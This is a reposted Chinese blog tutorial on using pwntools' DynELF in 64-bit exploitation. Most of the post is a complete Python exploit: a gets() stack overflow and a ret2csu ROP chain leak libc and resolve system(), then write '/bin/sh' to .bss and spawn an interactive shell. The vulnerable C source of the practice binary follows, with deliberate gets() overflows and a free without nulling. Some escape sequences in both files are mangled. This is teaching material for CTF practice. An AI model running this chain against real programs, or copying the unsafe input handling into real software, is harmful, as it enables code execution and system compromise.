• 64位下pwntools中dynELF函数的使用


    这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法

    编译好的程序 http://pan.baidu.com/s/1jImF95O

    源码在后面

    from pwn import *
    
    elf = ELF('./pwn_final')
    
    got_write = elf.got['write']
    print 'got_write= ' + hex(got_write)
    call_get_name_func = 0x400966
    print 'call_get_name_func= ' + hex(call_get_name_func)
    got_read = elf.got['read']
    print "got_read: " + hex(got_read)
    
    bss_addr = 0x6020c0
    
    pad = 'a'
    
    p = process('./pwn_final')
    gdb.attach(p)
    
    #get system address
    def leak(address):
        p.recvuntil('please enter your name:')
        payload1 = pad * 56
        payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80)
        payload1 += "x00"*56
        payload1 += p64(call_get_name_func)
        p.sendline(payload1)
        data = p.recv(128)
        print "%#x => %s" % (address, (data or '').encode('hex'))
        return data
    
    d = DynELF(leak, elf=ELF('./pwn_final'))
    
    system_addr = d.lookup('system', 'libc')
    print "system_addr=" + hex(system_addr)
    
    #write system && /bin/sh
    payload2 = "a"*56
    payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80)
    payload2 += "x00"*56
    payload2 += p64(call_get_name_func)
    p.sendline(payload2)
    
     
    p.send(p64(system_addr))
    p.send("/bin/sh")
    
    
    p.recvuntil('name:')
    
    # call system
    payload3 = "a"*56
    payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80)
    payload3 += "x00"*56
    payload3 += p64(call_get_name_func)
    p.sendline(payload3)
    
    
    p.interactive()
    

    源码

    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>
    
    void print_menu();
    void get_name();
    void add_paper();
    void delete_paper();
    void show_paper();
    int get_num();
    void get_input(char *buffer, int size, int no_should_fill_full);
    void gg();
    
    char *link_list[10];
    
    int main()
    {
        setbuf(stdout, 0);
        setbuf(stdin, 0);
        setbuf(stderr, 0);
        int choice;
        get_name();
        while (1){
            print_menu();
            choice = get_num();
            switch (choice){
                case 1:
                    add_paper();
                    break;
                case 2:
                    delete_paper();
                    break;
                case 3:
                    show_paper();
                    break;
                default:
                    return;
            }
        }
        printf("thank you!");
    }
    
    int get_num()
    {
        int result;
        char input[48];
        char *end_ptr;
        
        get_input(input, 48, 1);
        result = strtol(input, &end_ptr, 0);
        if (input == end_ptr){
            printf("%s input is not start with number!
    ", input);
            result = get_num();
        }
        return result;
    }
    
    void get_input(char *buffer, int size, int no_should_fill_full)
    {
        int index = 0;
        char *current_location;
        int current_input_size;
        while (1){
            current_location = buffer+index;
            current_input_size = fread(buffer+index, 1, 1, stdin);
            if (current_input_size <= 0)
                break;
            if (*current_location == '
    ' && no_should_fill_full){
                if (index){
                    *current_location = 0;
                    return;
                }        
            }else{
                index++;
                if (index >= size)
                    break;
            }
        }
    }
    
    void get_name()
    {
        char name[40];
        printf("please enter your name:");
        gets(name);
    }
    
    void print_menu()
    {
        puts("Welcome to use the improved paper management system!");
        puts("1 add paper");
        puts("2 delete paper");
        puts("3 show paper");
    }
    
    void show_paper()
    {
        int index;
        int length;
        printf("Input the index of the paper you want to show(0-9):");
        scanf("%d", &index);
        if (index < 0 || index > 9)
            exit(1);
        printf("How long you will enter:");
        scanf("%d", &length);
        if (length < 0 || length > 2048)
            exit(1);
        write(stdout, link_list[index], length);
    }
    
    void add_paper()
    {
        int index;
        int length;
        printf("Input the index you want to store(0-9):");
        scanf("%d", &index);
        if (index < 0 || index > 9)
            exit(1);
        printf("How long you will enter:");
        scanf("%d", &length);
        if (length < 0 || length > 2048)
            exit(1);
        link_list[index] = malloc(length);
        if (link_list[index] == NULL)
            exit(1);
        printf("please enter your content:");
        gets(link_list[index]);
        printf("add success!
    ");
    }
    
    void delete_paper()
    {
        int index;
        printf("which paper you want to delete,please enter it's index(0-9):");
        scanf("%d", &index);
        if (index < 0 || index > 9)
            exit(1);
        free(link_list[index]);
        puts("delete success !");
    }
    
    void gg()
    {
        char name[40];
        read(stdin, name, 40);
    }
    
  • 相关阅读:
    Redis安装与配置
    Mysql主从复制
    MySQL的基本使用
    如何理解 python 里面的 for 循环
    我在创业公司的 “云原生” 之旅
    linux 安装 kafka
    数据库性能优化
    Shell 中各种括号的作用
    DNS 配置实例-正反解析-主从同步-分离解析
    DHCP 中继转发配置(ensp 实现)
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/6142913.html
Copyright © 2020-2023  润新知